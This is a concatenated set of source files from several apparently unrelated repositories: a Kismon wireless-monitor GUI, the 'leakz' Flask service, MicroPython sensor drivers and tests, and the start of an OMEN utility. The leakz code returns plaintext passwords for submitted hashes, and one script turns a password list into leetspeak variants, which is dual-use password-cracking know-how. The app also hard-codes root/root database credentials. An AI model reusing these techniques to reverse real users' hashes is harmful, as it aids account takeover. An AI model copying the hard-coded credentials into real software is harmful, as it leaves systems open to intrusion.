table.attach(lock_button, 0, 1, 1, 2)
field = Gtk.SpinButton()
field.set_numeric(True)
field.set_max_length(3)
field.set_increments(1, 10)
field.set_range(1, 100)
if source["hop"] == 0:
field.set_value(int(source["channel"]))
else:
field.set_value(1)
field.set_sensitive(False)
self.widgets[uuid]["lock"] = field
field.connect("changed", self.on_change_value, uuid, "lock")
table.attach(field, 1, 2, 1, 2, xoptions=Gtk.AttachOptions.SHRINK)
label = Gtk.Label(label="channel")
label.set_justify(Gtk.Justification.FILL)
label.set_property("xalign", 0.1)
label.set_property("yalign", 0.5)
table.attach(label, 2, 3, 1, 2, xoptions=Gtk.AttachOptions.FILL)
button_box = Gtk.HButtonBox()
vbox.pack_end(button_box, False, False, 0)
cancel_button = Gtk.Button.new_with_mnemonic('_Cancel')
cancel_button.connect("clicked", self.on_cancel)
button_box.add(cancel_button)
apply_button = Gtk.Button.new_with_mnemonic('_Apply')
apply_button.connect("clicked", self.on_apply)
button_box.add(apply_button)
update_button = Gtk.Button.new_with_mnemonic('_Refresh')
update_button.connect("clicked", self.on_refresh)
button_box.add(update_button)
if self.vbox:
self.gtkwin.remove(self.vbox)
self.vbox = vbox
self.gtkwin.add(vbox)
self.gtkwin.show_all()
def on_change_mode(self, widget, uuid, mode):
if not widget.get_active():
return
self.changes[uuid] = mode
self.widgets[uuid][mode].set_sensitive(True)
if mode == "lock":
self.widgets[uuid]["hop"].set_sensitive(False)
else:
self.widgets[uuid]["lock"].set_sensitive(False)
def on_change_value(self, widget, uuid, mode):
self.changes[uuid] = mode
def on_apply(self, widget):
for uuid in self.changes:
mode = self.changes[uuid]
value = int(self.widgets[uuid][mode].get_value())
self.client_thread.client.set_channel(uuid, mode, value)
self.gtkwin.destroy()
def on_cancel(self, widget):
self.gtkwin.destroy()
def on_refresh(self, widget):
self.init_box()
```
#### File: kismon/windows/config.py
```python
from gi.repository import Gtk
class ConfigWindow:
def __init__(self, main_window):
self.gtkwin = Gtk.Window()
self.gtkwin.set_position(Gtk.WindowPosition.CENTER)
self.gtkwin.connect("destroy", self.on_destroy)
self.gtkwin.set_size_request(640, 320)
self.gtkwin.set_title("Kismon Preferences")
self.main_window = main_window
self.config = main_window.config
self.map = main_window.map
self.notebook = Gtk.Notebook()
self.gtkwin.add(self.notebook)
general_page = Gtk.Table(n_rows=2, n_columns=1)
general_page.set_property('margin', 5)
self.notebook.append_page(general_page)
self.notebook.set_tab_label_text(general_page, "General")
self.init_general_page(general_page)
map_page = Gtk.Table(n_rows=2, n_columns=1)
map_page.set_property('margin', 5)
self.notebook.append_page(map_page)
self.notebook.set_tab_label_text(map_page, "Map")
if self.map is None:
label = Gtk.Label(label="Map disabled")
map_page.attach(label, 0, 1, 0, 1, yoptions=Gtk.AttachOptions.SHRINK)
else:
self.init_map_page(map_page)
self.gtkwin.show_all()
def init_general_page(self, page):
frame = Gtk.Frame()
frame.set_label("Log List")
page.attach(frame, 0, 1, 0, 1, yoptions=Gtk.AttachOptions.SHRINK)
vbox = Gtk.VBox()
frame.add(vbox)
hbox = Gtk.HBox()
vbox.add(hbox)
label = Gtk.Label(label="Max rows in the log list: ")
label.set_property("xalign", 0)
label.set_property("yalign", 0.5)
label.set_justify(Gtk.Justification.RIGHT)
hbox.pack_start(label, False, False, 5)
field = Gtk.SpinButton()
field.set_numeric(True)
field.set_max_length(5)
field.set_increments(1, 100)
field.set_range(-1, 99999)
field.set_value(self.config["window"]["log_list_max"])
field.connect("output", self.on_change_log_list_max)
hbox.pack_start(field, False, False, 5)
label = Gtk.Label(label="-1 = unlimited 0 = disable")
label.set_property("xalign", 0)
label.set_property("yalign", 0.5)
hbox.pack_start(label, False, False, 5)
frame = Gtk.Frame()
frame.set_label("Autosave")
page.attach(frame, 0, 1, 1, 2, yoptions=Gtk.AttachOptions.SHRINK)
vbox = Gtk.VBox()
frame.add(vbox)
hbox = Gtk.HBox()
vbox.add(hbox)
label = Gtk.Label(label="Save the networks every (in minutes):")
hbox.pack_start(label, False, False, 5)
field = Gtk.SpinButton()
field.set_numeric(True)
field.set_max_length(5)
field.set_increments(1, 100)
field.set_range(0, 99999)
field.set_value(self.config["networks"]["autosave"])
field.connect("output", self.on_change_autosave)
hbox.pack_start(field, False, False, 5)
label = Gtk.Label(label="0 = disable")
label.set_property("xalign", 0)
label.set_property("yalign", 0.5)
hbox.pack_start(label, False, False, 5)
frame = Gtk.Frame()
frame.set_label("Tracks")
page.attach(frame, 0, 1, 2, 3, yoptions=Gtk.AttachOptions.SHRINK)
hbox = Gtk.HBox()
frame.add(hbox)
checkbox = Gtk.CheckButton.new_with_label("Store GPS Tracks")
if 'tracks' in self.config and self.config['tracks']['store'] is True:
checkbox.clicked()
checkbox.connect("clicked", self.on_change_tracks_store)
hbox.add(checkbox)
def on_change_log_list_max(self, widget):
if self.config["window"]["log_list_max"] == int(widget.get_value()):
return
self.config["window"]["log_list_max"] = int(widget.get_value())
self.main_window.log_list.cleanup(0)
def on_change_autosave(self, widget):
if self.config["networks"]["autosave"] == int(widget.get_value()):
return
self.config["networks"]["autosave"] = int(widget.get_value())
self.main_window.networks.set_autosave(self.config["networks"]["autosave"])
def on_change_tracks_store(self, widget):
self.config["tracks"]["store"] = widget.get_active()
def init_map_page(self, map_page):
position_frame = Gtk.Frame()
position_frame.set_label("Position")
map_page.attach(position_frame, 0, 1, 0, 1, yoptions=Gtk.AttachOptions.SHRINK)
position_vbox = Gtk.VBox()
position_frame.add(position_vbox)
map_widget = Gtk.RadioButton(group=None, label='In main window (default)')
if self.config["window"]["map_position"] == "widget":
map_widget.clicked()
map_widget.connect("clicked", self.main_window.on_map_widget)
position_vbox.add(map_widget)
map_window = Gtk.RadioButton(group=map_widget, label='In seperate window')
if self.config["window"]["map_position"] == "window":
map_window.clicked()
map_window.connect("clicked", self.main_window.on_map_window)
position_vbox.add(map_window)
map_hide = Gtk.RadioButton(group=map_widget, label='Hide')
if self.config["window"]["map_position"] == "hide":
map_hide.clicked()
map_hide.connect("clicked", self.main_window.on_map_hide)
position_vbox.add(map_hide)
source_frame = Gtk.Frame()
source_frame.set_label("Source")
source_vbox = Gtk.VBox()
source_frame.add(source_vbox)
map_page.attach(source_frame, 0, 1, 1, 2, yoptions=Gtk.AttachOptions.SHRINK)
first = None
for name, source in (("OpenStreetMap (default)", "openstreetmap"),
("OpenCycleMap", "opencyclemap"),
("Custom tile source", "custom")):
map_source = Gtk.RadioButton(group=first, label=name)
if first is None:
first = map_source
if self.config["map"]["source"] == source:
map_source.clicked()
map_source.connect("clicked", self.on_map_source, source)
source_vbox.add(map_source)
hbox = Gtk.HBox()
source_vbox.add(hbox)
label = Gtk.Label(label=" URL: ")
label.set_property("xalign", 0)
label.set_property("yalign", 0.5)
label.set_justify(Gtk.Justification.LEFT)
hbox.pack_start(label, False, False, 5)
entry = Gtk.Entry()
entry.set_width_chars(50)
entry.set_text(self.config["map"]["custom_source_url"])
entry.connect("changed", self.on_change_map_source_custom_url)
hbox.pack_start(entry, False, False, 5)
hbox = Gtk.HBox()
source_vbox.add(hbox)
x = 1
for name in (" Zoom Levels: ", " - "):
label = Gtk.Label(label=name)
label.set_property("xalign", 0)
label.set_property("yalign", 0.5)
label.set_justify(Gtk.Justification.LEFT)
hbox.pack_start(label, False, False, 5)
field = Gtk.SpinButton()
field.set_numeric(True)
field.set_max_length(5)
field.set_increments(1, 3)
field.set_range(1, 18)
if x == 1:
name = "custom_source_min"
else:
name = "custom_source_max"
field.set_value(self.config["map"][name])
field.connect("output", self.on_change_map_source_custom_zoom, name)
hbox.pack_start(field, False, False, 5)
x += 1
apply_button = Gtk.Button.new_with_mnemonic('_Apply')
apply_button.connect("clicked", self.on_map_source, "custom")
hbox.pack_start(apply_button, False, False, 5)
perf_frame = Gtk.Frame()
perf_frame.set_label("Performance")
perf_vbox = Gtk.VBox()
perf_frame.add(perf_vbox)
map_page.attach(perf_frame, 0, 1, 4, 5, yoptions=Gtk.AttachOptions.SHRINK)
perf_marker_positions = Gtk.CheckButton.new_with_label("Update marker positions")
if self.config["map"]["update_marker_positions"] is True:
perf_marker_positions.clicked()
perf_marker_positions.connect("clicked", self.on_update_marker_positions)
perf_vbox.add(perf_marker_positions)
def on_destroy(self, window):
self.gtkwin = None
def on_map_source(self, widget, source):
if (type(widget) == Gtk.RadioButton and widget.get_active()) or type(widget) == Gtk.Button:
self.map.change_source(source)
if self.config["window"]["map_position"] == "widget":
self.main_window.on_map_widget(None, True)
elif self.config["window"]["map_position"] == "window":
self.main_window.map_window.gtkwin.add(self.main_window.map.widget)
self.main_window.map_window.gtkwin.show_all()
def on_change_map_source_custom_url(self, widget):
self.config["map"]["custom_source_url"] = widget.get_text()
def on_change_map_source_custom_zoom(self, widget, name):
self.config["map"][name] = int(widget.get_value())
def on_update_marker_positions(self, widget):
self.config["map"]["update_marker_positions"] = widget.get_active()
```
#### File: kismon/windows/map.py
```python
from .template import TemplateWindow
class MapWindow(TemplateWindow):
def __init__(self, map):
TemplateWindow.__init__(self)
self.gtkwin.set_title("Map")
self.gtkwin.show()
self.gtkwin.set_size_request(320, 240)
self.gtkwin.resize(640, 480)
self.map = map
self.gtkwin.add(self.map.widget)
def on_destroy(self, window):
self.remove_map()
self.gtkwin = None
def remove_map(self):
if self.gtkwin is not None:
self.gtkwin.remove(self.map.widget)
def hide(self):
self.gtkwin.hide()
```
#### File: kismon/windows/signal.py
```python
import time
from gi.repository import Gtk
from gi.repository import GObject
class SignalWindow:
def __init__(self, mac, destroy, seconds=120):
self.mac = mac
self.history = {}
self.sources = {}
self.time_range = seconds
self.colors = [
(0, 1, 0),
(1, 0, 0),
(0, 0, 1),
(1, 1, 0),
(0, 1, 1),
(0, 0.5, 0),
(0.5, 0, 0),
(0, 0, 0.5),
]
self.graph_type = "signal"
self.gtkwin = Gtk.Window()
self.gtkwin.set_position(Gtk.WindowPosition.CENTER)
self.gtkwin.connect("destroy", destroy, mac)
self.gtkwin.set_default_size(620, 320)
self.gtkwin.set_title("Signal Graph: %s" % self.mac)
self.graph = Gtk.DrawingArea()
self.graph.connect("draw", self.on_draw_event)
button_box = Gtk.HButtonBox()
signal_button = Gtk.RadioButton(label='Signal strength')
signal_button.connect("clicked", self.on_graph_type, "signal")
signal_button.clicked()
button_box.add(signal_button)
packets_button = Gtk.RadioButton(group=signal_button, label='Packets per second')
packets_button.connect("clicked", self.on_graph_type, "packets")
button_box.add(packets_button)
self.sources_list = Gtk.TreeView()
tvcolumn = Gtk.TreeViewColumn("Color")
cell = Gtk.CellRendererText()
tvcolumn.pack_start(cell, True)
cell.set_property('background-set', True)
tvcolumn.set_attributes(cell, text=0, background=9)
self.sources_list.append_column(tvcolumn)
num = 1
for column in ("Name", "Type", "Signal (dbm)", "Min", "Max", "Packets/sec", "Packets", "Server"):
tvcolumn = Gtk.TreeViewColumn(column)
self.sources_list.append_column(tvcolumn)
cell = Gtk.CellRendererText()
tvcolumn.pack_start(cell, True)
tvcolumn.add_attribute(cell, 'text', num)
num += 1
self.sources_list_store = Gtk.ListStore(
GObject.TYPE_STRING,
GObject.TYPE_STRING,
GObject.TYPE_STRING,
GObject.TYPE_INT,
GObject.TYPE_INT,
GObject.TYPE_INT,
GObject.TYPE_INT,
GObject.TYPE_INT,
GObject.TYPE_INT, # server
GObject.TYPE_STRING, # bg color
)
self.sources_list.set_model(self.sources_list_store)
expander = Gtk.Expander()
expander.set_label("Sources")
expander.set_expanded(True)
expander.add(self.sources_list)
vbox = Gtk.VBox()
vbox.pack_start(button_box, expand=False, fill=False, padding=0)
vbox.add(self.graph)
vbox.pack_end(expander, expand=False, fill=False, padding=0)
self.gtkwin.add(vbox)
self.gtkwin.show_all()
def on_graph_type(self, widget, graph_type):
if not widget.get_active():
return
self.graph_type = graph_type
self.graph.queue_draw()
def on_draw_event(self, widget, context):
width = self.graph.get_allocated_width()
height = self.graph.get_allocated_height()
self.draw_graph(width, height, context)
for uuid in self.sources:
source = self.sources[uuid]
line = ['#', source["name"], source["type"],
source["signal"], source["signal_min"], source["signal_max"],
source["pps"], source["packets"], source["server"], self.get_color(uuid, return_hex=True)]
if "iter" in source:
source_iter = source["iter"]
num = 0
for value in line:
self.sources_list_store.set_value(source_iter, num, value)
num += 1
else:
source["iter"] = self.sources_list_store.append(line)
def draw_graph(self, width, height, ctx):
border_left = 60
border_right = 0
border_bottom = 30
graph_width = width - border_left - border_right
graph_height = height - border_bottom
if self.graph_type == "signal":
index = 0
data_min = -100
data_max = -50
data_step = 5
text = "%s dbm"
else:
index = 1
data_min = 0
data_max = 20
data_step = 2
text = "%s p/s"
if len(self.history) > 0:
start_sec = max(self.history) - self.time_range
else:
start_sec = 0
x_rel = 1.0 * graph_width / self.time_range
for sec in self.history:
if sec < start_sec:
continue
for uuid in self.history[sec]:
data_min = min(data_min, self.history[sec][uuid][index])
data_max = max(data_max, self.history[sec][uuid][index])
data_max += 1
data_range = data_max - data_min
y_rel = 1.0 * graph_height / data_range
# background
ctx.set_source_rgb(0, 0, 0)
ctx.rectangle(0, 0, width, height)
ctx.fill()
ctx.stroke()
# legend
ctx.set_line_width(1)
ctx.set_source_rgb(1, 1, 1)
ctx.move_to(border_left, 0)
ctx.line_to(border_left, graph_height + 5)
ctx.move_to(border_left - 5, graph_height)
ctx.line_to(width - border_right, height - border_bottom)
ctx.line_to(width - border_right, 0)
ctx.move_to(border_left - 55, graph_height + 4)
ctx.show_text(text % data_min)
while True:
r = range(data_min, data_max, data_step)
if len(r) > 6: # max. 6 horizontal lines
data_step = data_step * 2
else:
break
for value in r:
y = y_rel * (data_max - value)
ctx.move_to(border_left - 5, y)
ctx.line_to(width - border_right, y)
ctx.move_to(border_left - 55, y + 4)
ctx.show_text(text % value)
ctx.move_to(border_left - 15, graph_height + 16)
ctx.show_text("-%ss" % self.time_range)
ctx.move_to(border_left + graph_width / 2, graph_height + 1)
ctx.line_to(border_left + graph_width / 2, graph_height + 6)
ctx.move_to(border_left + graph_width / 2 - 12, graph_height + 16)
ctx.show_text("-%ss" % (self.time_range / 2))
ctx.stroke()
# graph
ctx.set_line_width(2)
ctx.set_source_rgb(0, 1, 0)
if len(self.history) < 2:
ctx.move_to(width / 2, height / 2)
ctx.show_text("collecting data")
ctx.stroke()
return False
for uuid in self.sources:
start = False
sec = 0
color = self.get_color(uuid)
ctx.set_source_rgb(*color)
while True:
if start_sec + sec in self.history and uuid in self.history[start_sec + sec]:
value = self.history[start_sec + sec][uuid][index]
x = x_rel * sec + border_left
y = y_rel * (data_max - value)
if not start:
ctx.move_to(x, y)
start = True
sec += 1
else:
ctx.line_to(x, y)
sec += 1
if sec > self.time_range:
break
ctx.stroke()
return False
def get_color(self, uuid, return_hex=False):
try:
color = self.colors[self.sources[uuid]["number"]]
except ValueError:
color = (1, 1, 1)
if return_hex:
color = "#%0.2X%0.2X%0.2X" % (color[0] * 255, color[1] * 255, color[2] * 255)
return color
def add_value(self, source_data, packets, signal, timestamp, server_id):
uuid = "%i-%s" % (server_id, source_data["uuid"])
if uuid not in self.sources:
self.sources[uuid] = source_data
source = source_data
source["number"] = len(self.sources) - 1
source["server"] = server_id + 1
source["signal"] = signal
source["signal_min"] = signal
source["signal_max"] = signal
source["packets"] = packets
source["pps"] = 0
else:
source = self.sources[uuid]
source["signal"] = signal
source["signal_min"] = min(signal, source["signal_min"])
source["signal_max"] = max(signal, source["signal_max"])
source["pps"] = packets - source["packets"]
source["packets"] = packets
if timestamp not in self.history:
self.history[timestamp] = {}
self.history[timestamp][uuid] = (signal, source["pps"])
self.graph.queue_draw()
``` |
{
"source": "84KaliPleXon3/leakz",
"score": 2
} |
#### File: 84KaliPleXon3/leakz/app.py
```python
import os
import re
import sys
import json
import locale
import pymongo
import datetime
from flask import abort
from flask import Flask
from flask import request
from flask import jsonify
from flask import render_template
from datetime import datetime
from influxdb import InfluxDBClient
reload(sys)
sys.setdefaultencoding('utf8')
locale.setlocale(locale.LC_ALL, 'de_DE.UTF-8')
app = Flask(__name__, static_folder='static', static_url_path='')
@app.template_filter()
def format_time(timestamp):
return datetime.strptime(timestamp.replace('Z', ''), '%Y%m%d%H%M%S').strftime('%d.%m.%Y %H:%M')
def connect_database(database, port, uri):
secret = get_secret()
client = pymongo.MongoClient('mongodb://{}:{}/'.format(uri, port),
username='pymongo',
password=<PASSWORD>,
authSource=database,
authMechanism='SCRAM-SHA-1')
return client[database]
def get_config():
path = os.path.abspath(os.path.join(os.path.dirname(__file__), '.config'))
return ''.join(load_document(path))
def get_secret():
path = os.path.abspath(os.path.join(os.path.dirname(__file__), '.secret'))
return load_document(path)[0].strip()
def load_document(filename):
try:
with open(filename, 'rb') as f:
return f.readlines()
except IOError as e:
print e
sys.exit(1)
def get(iterable, keys):
try:
result = iterable
for key in keys:
result = result[key]
return result
except (KeyError, IndexError) as e:
return None
def guess_hash(hash_string):
m = re.match(r'^[0-9a-fA-F]+$', hash_string)
if m:
hash = {
32: 'hash.md5',
40: 'hash.sha1',
56: 'hash.sha224',
64: 'hash.sha256',
96: 'hash.sha384',
128: 'hash.sha512'
}
if len(hash_string) in hash:
return hash[len(hash_string)], hash_string.lower()
return 'password', hash_string
def search_hash_or_password(collection, param_query):
key, hash = guess_hash(param_query)
return list(collection.find({key: hash}, {'_id': 0}))
def api_search_hash(collection, param_query):
key, hash = guess_hash(param_query)
try:
return list(collection.find({key: hash}, {'_id': 0, 'password': 1}))[0]
except IndexError as e:
return []
def api_search_password(collection, param_query):
key, hash = guess_hash(param_query)
try:
return list(collection.find({key: hash}, {'_id': 0, 'password': 0}))[0]['hash']
except IndexError as e:
return []
def api_search_mail(collection, param_query):
try:
result = list(collection.find({'mail': param_query}, {'_id': 0, 'mail': 0}))[0]
return {
'leaked': ', '.join(result['leak'])
}
except IndexError as e:
return []
def handle_pagination(param_skip, param_limit):
if param_skip == 0:
param_skip = 10
entries = range(param_skip, (param_skip + param_limit * 8), param_limit)
last_entry = (entries[-1] + param_limit)
if entries[-1] <= 80:
first_entry = 0
else:
first_entry = (entries[-1] - 80)
return first_entry, last_entry, entries
def match_mail_address(document):
return re.match(r'\b[\w.+-]+?@[-_\w]+[.]+[-_.\w]+\b', document)
@app.route('/', methods=['GET'])
def show_homepage():
config = json.loads(get_config())
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
amount_hashes = db['passwords'].count()
amount_mails = db['mails'].count()
return render_template('home.html',
amount_hashes='{:n}'.format(amount_hashes),
amount_mails='{:n}'.format(amount_mails),
title='Is my mail address leaked?',
searchform_visible=True,
alert_visible=True)
@app.route('/api', methods=['GET'])
def show_api():
return render_template('api.html',
menu_is_active='api')
@app.route('/legal', methods=['GET'])
def show_legal():
return render_template('legal.html')
@app.route('/privacy', methods=['GET'])
def show_privacy():
return render_template('privacy.html')
@app.route('/hash/latest', methods=['GET'])
def show_hash_list():
config = json.loads(get_config())
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
collection = db['passwords']
try:
param_skip = int(request.args.get('skip'))
except (ValueError, TypeError) as e:
param_skip = 0
try:
param_limit = int(request.args.get('limit'))
if param_limit > 200:
param_limit = 200
except (ValueError, TypeError) as e:
param_limit = 10
pagination_list = handle_pagination(param_skip, param_limit)
result_list = list(collection.find().skip(
param_skip).limit(param_limit).sort([('$natural', -1)]))
return render_template('latest.html',
result_type='hash',
url='/hash/latest',
menu_is_active='latest',
result_list=result_list,
entries=pagination_list[2],
last_entry=pagination_list[1],
first_entry=pagination_list[0])
@app.route('/api/hash/<param_query>', methods=['GET'])
def api_query_hash(param_query):
config = json.loads(get_config())
influx_client = InfluxDBClient(config['influxdb_uri'], config['influxdb_port'], 'root', 'root', config['influxdb_db'])
influx_client.create_database(config['influxdb_db'])
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
collection = db['passwords']
data = api_search_hash(collection, param_query)
influx_json_body = [{
'measurement': 'api_endpoint_short',
'tags': {
'endpoint': 'hash'
},
'time': datetime.utcnow(),
'fields': {
'status': 200 if data else 404,
'value': param_query.lower()
}
}]
influx_client.write_points(influx_json_body)
if data:
return jsonify(data)
else:
return abort(404)
@app.route('/api/password/<param_query>', methods=['GET'])
def api_query_password(param_query):
config = json.loads(get_config())
influx_client = InfluxDBClient(config['influxdb_uri'], config['influxdb_port'], 'root', 'root', config['influxdb_db'])
influx_client.create_database(config['influxdb_db'])
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
collection = db['passwords']
data = api_search_password(collection, param_query)
influx_json_body = [{
'measurement': 'api_endpoint_short',
'tags': {
'endpoint': 'password'
},
'time': datetime.utcnow(),
'fields': {
'status': 200 if data else 404,
'value': param_query
}
}]
influx_client.write_points(influx_json_body)
if data:
return jsonify(data)
else:
return abort(404)
@app.route('/api/mail/<param_query>', methods=['GET'])
def api_query_mail(param_query):
config = json.loads(get_config())
influx_client = InfluxDBClient(config['influxdb_uri'], config['influxdb_port'], 'root', 'root', config['influxdb_db'])
influx_client.create_database(config['influxdb_db'])
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
collection = db['mails']
data = api_search_mail(collection, param_query)
influx_json_body = [{
'measurement': 'api_endpoint_short',
'tags': {
'endpoint': 'mail'
},
'time': datetime.utcnow(),
'fields': {
'status': 200 if data else 404,
'value': param_query.lower()
}
}]
influx_client.write_points(influx_json_body)
if data:
return jsonify(data)
else:
return abort(404)
@app.route('/hash/<param_query>', methods=['GET'])
def show_hash_value(param_query):
config = json.loads(get_config())
influx_client = InfluxDBClient(config['influxdb_uri'], config['influxdb_port'], 'root', 'root', config['influxdb_db'])
influx_client.create_database(config['influxdb_db'])
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
col_password = db['<PASSWORD>']
result_list = search_hash_or_password(col_password, param_query)
result_type = 'hash'
influx_json_body = [{
'measurement': 'api_endpoint_short',
'tags': {
'endpoint': 'hash'
},
'time': datetime.utcnow(),
'fields': {
'status': 200 if len(result_list) > 0 else 404,
'value': param_query.lower()
}
}]
influx_client.write_points(influx_json_body)
return render_template('home.html',
title='Detailed information',
result_list=result_list,
result_type=result_type,
param_query=param_query,
searchform_visible=False,
pagination_visible=False)
@app.route('/search', methods=['GET'])
def show_hash():
config = json.loads(get_config())
influx_client = InfluxDBClient(config['influxdb_uri'], config['influxdb_port'], 'root', 'root', config['influxdb_db'])
influx_client.create_database(config['influxdb_db'])
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
col_password = db['<PASSWORD>']
col_mail = db['mails']
try:
param_query = request.args.get('q')
except (ValueError, TypeError) as e:
param_query = ''
if match_mail_address(param_query):
result_list = list(col_mail.find({'mail': param_query}))
result_type = 'mail'
else:
result_list = search_hash_or_password(col_password, param_query)
result_type = 'hash'
return render_template('home.html',
result_list=result_list,
result_type=result_type,
param_query=param_query,
title='Is my mail address leaked?',
pagination_visible=False,
searchform_visible=True)
@app.route('/api/cert/<param_query>', methods=['GET'])
def api_query_cert(param_query):
config = json.loads(get_config())
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
collection = db['certs']
result_list = list(collection.find(
{'subject.common_name': param_query}, {'_id': 0}))
if len(result_list) == 0:
return 'ERROR no result was found'
return render_template('certificate.html',
result_list=result_list)
@app.route('/cert', methods=['GET'])
def find_all_cert():
config = json.loads(get_config())
db = connect_database(config['mongodb_db'], config['mongodb_port'], config['mongodb_uri'])
collection = db['certs']
result_list = list(collection.find({}, { '_id': 0 }).limit(10))
return render_template('certificate.html', result_list=result_list)
if __name__ == '__main__':
app.run(host="0.0.0.0", port=5000, threaded=True)
```
#### File: leakz/resources/convert_into_leetspeak.py
```python
import os
import sys
import json
import pymongo
import hashlib
from pymongo.errors import WriteError
from pymongo.errors import DuplicateKeyError
import utils.database_helper as dbh
import utils.password_handling as ph
import utils.file_handling as fh
def insert_one(collection, password_string, hash_string):
try:
inserted_id = collection.insert_one(
{'password': password_string.decode('utf-8'), 'hash': hash_string}).inserted_id
print u'[I] Added {} with id: {}'.format(password_string.decode('utf-8'), inserted_id)
except (UnicodeDecodeError) as e:
print u'[E] {}'.format(e)
sys.exit(1)
except (DuplicateKeyError, WriteError) as e:
print u'[E] {}'.format(e)
def simple_leetspeak(text):
pattern = {'a': '4', 'A': '4', 'b': '8', 'B': '8', 'e': '3', 'E': '3', 'g': '6',
'G': '6', 'i': '1', 'I': '1', 'o': '0', 'O': '0', 's': '5', 'S': '5',
't': '7', 'T': '7'}
for key, value in pattern.iteritems():
text = text.replace(key, value)
return text
def main():
config = json.loads(fh.get_config())
db = dbh.connect_database(config['db_name'], config['db_port_passwords'])
collection = db['passwords']
try:
collection.create_index("password", unique=True)
collection.create_index("hash.md5", unique=True)
collection.create_index("hash.sha1", unique=True)
collection.create_index("hash.sha224", unique=True)
collection.create_index("hash.sha256", unique=True)
collection.create_index("hash.sha384", unique=True)
collection.create_index("hash.sha512", unique=True)
except pymongo.errors.OperationFailure as e:
print e
sys.exit(1)
documents = dbh.find_all_documents(collection)
for document in documents:
password = document['password'].encode('utf-8')
leetspeak = simple_leetspeak(password)
if leetspeak != password:
hash_string = ph.hash_password(leetspeak)
insert_one(collection, leetspeak, hash_string)
if __name__ == '__main__':
main()
```
#### File: leakz/resources/generate_bcrypt.py
```python
import sys
import bcrypt
import pymongo
from pymongo.errors import WriteError
from pymongo.errors import BulkWriteError
from pymongo.errors import DuplicateKeyError
import utils.file_handling as fh
def connect_database(database, port):
secret = fh.get_secret()
client = pymongo.MongoClient('mongodb://localhost:{}/'.format(port),
username='pymongo', password=<PASSWORD>, authSource=database, authMechanism='SCRAM-SHA-1')
return client[database]
def insert_one(collection, password_string, hash_string):
try:
inserted_id = collection.insert_one({'password': <PASSWORD>, 'hash': hash_string}).inserted_id
print u'[I] Added {} with id: {}'.format(hash_string, inserted_id)
except (DuplicateKeyError, WriteError) as e:
print u'[E] {}'.format(e)
def create_bcrypt_hash(collection):
passwd = b"<PASSWORD>"
for i in xrange(7998152934):
salt = bcrypt.gensalt(rounds=12, prefix=b'2b')
hashed_pwd = bcrypt.hashpw(passwd, salt)
insert_one(collection, passwd, hashed_pwd)
def main():
db = connect_database('intel', '27017')
collection = db['bcrypt']
try:
collection.create_index("hash", unique=True)
except pymongo.errors.OperationFailure as e:
print e
sys.exit(1)
create_bcrypt_hash(collection)
if __name__ == '__main__':
main()
```
#### File: resources/utils/file_handling.py
```python
import os
import sys
def load_document(filename):
try:
with open(filename, 'r') as f:
return f.readlines()
except IOError as e:
print e
sys.exit(1)
def save_document(filename, document):
with open(filename, 'w') as f:
f.write(document)
def get_secret():
path = os.path.abspath(os.path.join(
os.path.dirname(__file__), '../../.secret'))
return load_document(path)[0].strip()
def get_config():
path = os.path.abspath(os.path.join(
os.path.dirname(__file__), '../../.config'))
return ''.join(load_document(path))
``` |
{
"source": "84KaliPleXon3/micropython-esp32",
"score": 4
} |
#### File: drivers/onewire/ds18x20.py
```python
from onewire import OneWire
class DS18X20(object):
def __init__(self, pin):
self.ow = OneWire(pin)
# Scan the 1-wire devices, but only keep those which have the
# correct # first byte in their rom for a DS18x20 device.
self.roms = [rom for rom in self.ow.scan() if rom[0] == 0x10 or rom[0] == 0x28]
def read_temp(self, rom=None):
"""
Read and return the temperature of one DS18x20 device.
Pass the 8-byte bytes object with the ROM of the specific device you want to read.
If only one DS18x20 device is attached to the bus you may omit the rom parameter.
"""
rom = rom or self.roms[0]
ow = self.ow
ow.reset()
ow.select_rom(rom)
ow.write_byte(0x44) # Convert Temp
while True:
if ow.read_bit():
break
ow.reset()
ow.select_rom(rom)
ow.write_byte(0xbe) # Read scratch
data = ow.read_bytes(9)
return self.convert_temp(rom[0], data)
def read_temps(self):
"""
Read and return the temperatures of all attached DS18x20 devices.
"""
temps = []
for rom in self.roms:
temps.append(self.read_temp(rom))
return temps
def convert_temp(self, rom0, data):
"""
Convert the raw temperature data into degrees celsius and return as a float.
"""
temp_lsb = data[0]
temp_msb = data[1]
if rom0 == 0x10:
if temp_msb != 0:
# convert negative number
temp_read = temp_lsb >> 1 | 0x80 # truncate bit 0 by shifting, fill high bit with 1.
temp_read = -((~temp_read + 1) & 0xff) # now convert from two's complement
else:
temp_read = temp_lsb >> 1 # truncate bit 0 by shifting
count_remain = data[6]
count_per_c = data[7]
temp = temp_read - 0.25 + (count_per_c - count_remain) / count_per_c
return temp
elif rom0 == 0x28:
temp = (temp_msb << 8 | temp_lsb) / 16
if (temp_msb & 0xf8) == 0xf8: # for negative temperature
temp -= 0x1000
return temp
else:
assert False
```
#### File: tests/basics/fun_error2.py
```python
try:
enumerate
except:
print("SKIP")
import sys
sys.exit()
def test_exc(code, exc):
try:
exec(code)
print("no exception")
except exc:
print("right exception")
except:
print("wrong exception")
# function with keyword args not given a specific keyword arg
test_exc("enumerate()", TypeError)
```
#### File: tests/basics/subclass_classmethod.py
```python
class Base:
@classmethod
def foo(cls):
print(cls.__name__)
try:
Base.__name__
except AttributeError:
import sys
print("SKIP")
sys.exit()
class Sub(Base):
pass
Sub.foo()
# overriding a member and accessing it via a classmethod
class A(object):
foo = 0
@classmethod
def bar(cls):
print(cls.foo)
def baz(self):
print(self.foo)
class B(A):
foo = 1
B.bar() # class calling classmethod
B().bar() # instance calling classmethod
B().baz() # instance calling normal method
``` |
{
"source": "84KaliPleXon3/OMEN",
"score": 3
} |
#### File: OMEN/utils/ascii_filter.py
```python
import sys
def is_ascii(s):
return all(((ord(c) >= 32 and ord(c) <= 126) or ord(c) == 0x0A or ord(c) == 0x0D) for c in s)
removed_counter = 0
# Open file with universal newlines as binary file
with open(str(sys.argv[1]), 'rbU') as passwordfile:
for line in passwordfile:
